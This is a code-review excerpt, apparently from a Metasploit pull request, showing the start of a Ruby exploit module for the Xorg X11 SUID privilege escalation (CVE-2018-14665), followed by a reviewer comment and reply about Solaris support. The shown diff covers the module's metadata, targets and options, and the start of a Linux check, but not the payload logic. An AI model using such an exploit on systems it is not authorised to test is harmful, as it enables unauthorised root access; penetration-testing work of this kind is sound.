modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb

```diff
@@ -0,0 +1,204 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::System
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server SUID privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges with SUID Xorg X11 server
+        versions 1.19.0 < 1.20.3.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg.  This allows unprivileged users that can start the server
+        the ability to elevate privileges and run arbitrary code under root
+        privileges.
+
+        This module has been tested with CentOS 7 (1708).
+        CentOS default install will require console auth for the users session.
+        Xorg must have SUID permissions and may not start if running.
+
+        On successful exploitation artifacts will be created consistant
+        with starting Xorg.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Aaron Ringo',     # Metasploit module
+        ],
+      'DisclosureDate' => 'Oct 25 2018',
+      'References'     =>
+        [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'EDB', '45697' ],
+           [ 'EDB', '45742' ],
+           [ 'EDB', '45832' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]
+        ],
+      'Platform'       =>  %w[linux],
+      'Arch'           =>  [ARCH_X86, ARCH_X64],
+      'SessionTypes'   =>  %w[shell meterpreter],
+      'Targets'        =>
+        [
+           ['Linux x64', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X64] } ],
+           ['Linux x86', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X86] } ]
+        ],
+      'DefaultTarget'  => 0))
+
+     register_advanced_options(
+       [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
+         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),
+         OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])
+       ]
+     )
+  end
+
+
+  def check
+
+    # linux checks
+    uname = cmd_exec "uname"
+    if uname =~ /linux/i
```

Comment:
This isn't necessary if you're only targeting Linux.

Reply:
This technique works on Solaris also, I'll open it up.  It does not work on OpenBSD though.